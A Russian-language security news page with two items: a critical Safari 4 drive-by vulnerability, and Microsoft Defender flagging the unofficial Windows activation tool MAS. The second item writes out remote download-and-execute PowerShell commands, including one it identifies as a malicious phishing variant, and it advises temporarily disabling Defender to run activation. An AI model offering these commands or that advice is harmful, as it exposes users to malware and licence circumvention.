Браузер Apple Safari подвержен критической уязвимости

Браузер Apple Safari подвержен критической уязвимости

Интернет-браузер Apple Safari содержит критически опасную уязвимость, которая допускает возможность заражения компьютера под управлением Windows вредоносным кодом. Об этом сегодня сообщили одновременно американская US-Cert и датская ИТ-компания Secunia. В обоих сообщениях указывается, что хакеры имеют возможность полностью скомпрометировать компьютер посредством DriveBy-атаки.



По данным Secunia, уязвимость проявляется в случае, когда браузер порождает новое окно со специально сгенерированным злонамеренным заголовком. На практике эксплуатировать указанную уязвимость можно через самую обычную ссылку с меткой открытия веб-страницы в новом окне.

Процесс заражения ПК происходит в момент открытия новой страницы или всплывающего PopUp-окна. В US-Cert говорят, что зафиксировали атаки, сценарий которых ведет к открытию новых страниц через сервисы GMail и Windows Live Hotmail. В сообщении обоих источников говорится, что атаке подвержены все браузеры семейства Safari 4, включая последнюю стабильную версию 4.0.5.

Secunia классифицирует найденный баг как "чрезвычайно опасный". Дополнительную опасность ему придает и тот факт, что при минимальной модификации кода возникает угроза проведения атаки и в среде Mac OS X.

Источник

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru